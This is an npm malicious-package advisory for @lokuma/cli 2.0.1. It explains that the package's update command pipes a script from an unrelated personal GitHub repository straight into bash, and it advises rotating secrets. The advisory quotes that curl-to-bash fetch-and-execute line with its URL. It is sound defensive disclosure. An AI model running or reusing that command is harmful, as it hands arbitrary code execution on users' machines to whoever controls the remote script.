npm · Malicious package advisory
Malware@lokuma/cli
MAL-2026-4405
Malicious code in @lokuma/cli (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (c1ea692229343873d930161e52d11be25bab87d4a00e942ceb18c1751f0f7586) The `update` subcommand of this CLI executes `curl -fsSL <url> | bash` where the URL is `https://raw.githubusercontent.com/Mumu090909/lokuma-da-v2-trial/main/installer/install-v2-trial.sh` — a mutable `main` branch on a personal GitHub account (`Mumu090909`) that does not match the package's declared publisher (scope `@lokuma`, author `hello@lokuma.ai`, repo `github.com/lokuma-web/lokuma-cli`, homepage `lokuma.ai`). The fetch has no commit pin, no hash, and no signature check. README instructs users to run `lokuma update`, so any user following the documented upgrade path will execute whatever shell script `Mumu090909` chooses to host at that path on any future date. Whoever controls that personal repository can run arbitrary commands as the invoking user on every machine that runs the update command. The publisher mismatch (a personal account fronting an installer for a scoped vendor package) and the README/homepage TLD inconsistency (`lokuma.ai` vs `lokuma.io`) further weaken any benign reading.
Compromised versions (1)
- 2.0.1
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.